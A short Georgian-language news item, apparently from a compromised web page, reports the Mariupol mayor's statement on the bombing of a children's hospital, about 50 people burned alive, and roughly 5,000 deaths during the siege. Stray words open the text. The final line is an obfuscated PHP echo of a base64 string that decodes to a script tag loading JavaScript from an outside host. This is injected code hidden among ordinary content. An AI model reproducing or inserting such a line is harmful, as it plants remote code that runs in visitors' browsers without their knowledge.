celsiusi
ავერსი შნაიდერი
მარიუპოლის მერის, ვადიმ ბოიჩენკოს განცხადებით, ქალაქ მარიუპოლში ბავშვთა საავადმყფოფოს დაბომბვისას 50-მდე ადამიანი ცოცხლად დაიწვა. ინფორმაციას „უკრაინსკაია პრავდა“ ავრცელებს.
 
მისივე ინფორმაციით, ქალაქის 90%-ზე მეტი განადგურებულია, აქედან მინიმუმ 40% კი ვეღარ აღდგება.
 
"მხოლოდ წინასწარი შეფასებით, მარიუპოლში ბლოკადის თვის განმავლობაში დაიღუპა 5000 ადამიანი, მათგან დაახლოებით 210 ბავშვი იყო. რუსუმა ტერორისტებმა რამდენიმე მძიმე ბომბი ჩამოაგდეს ბავშვთა საავადმყოფოს და გაანადგურეს ქალაქის საავადმყოფოს ერთ-ერთი შენობა. თითქმის 50 ადამიანი ცოცხლად დაწვეს. დაიბომბა თეატრი, სადაც იმ დროისთვის 900-ზე მეტი ადამიანი აფარებდა თავს. ეს მარიუპოლის მშვიდობიანი მოსახლეობის მიზანმიმართული განადგურების მხოლოდ რამდენიმე მაგალითია",- თქვა მარიუპოლის მერმა. 
835
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");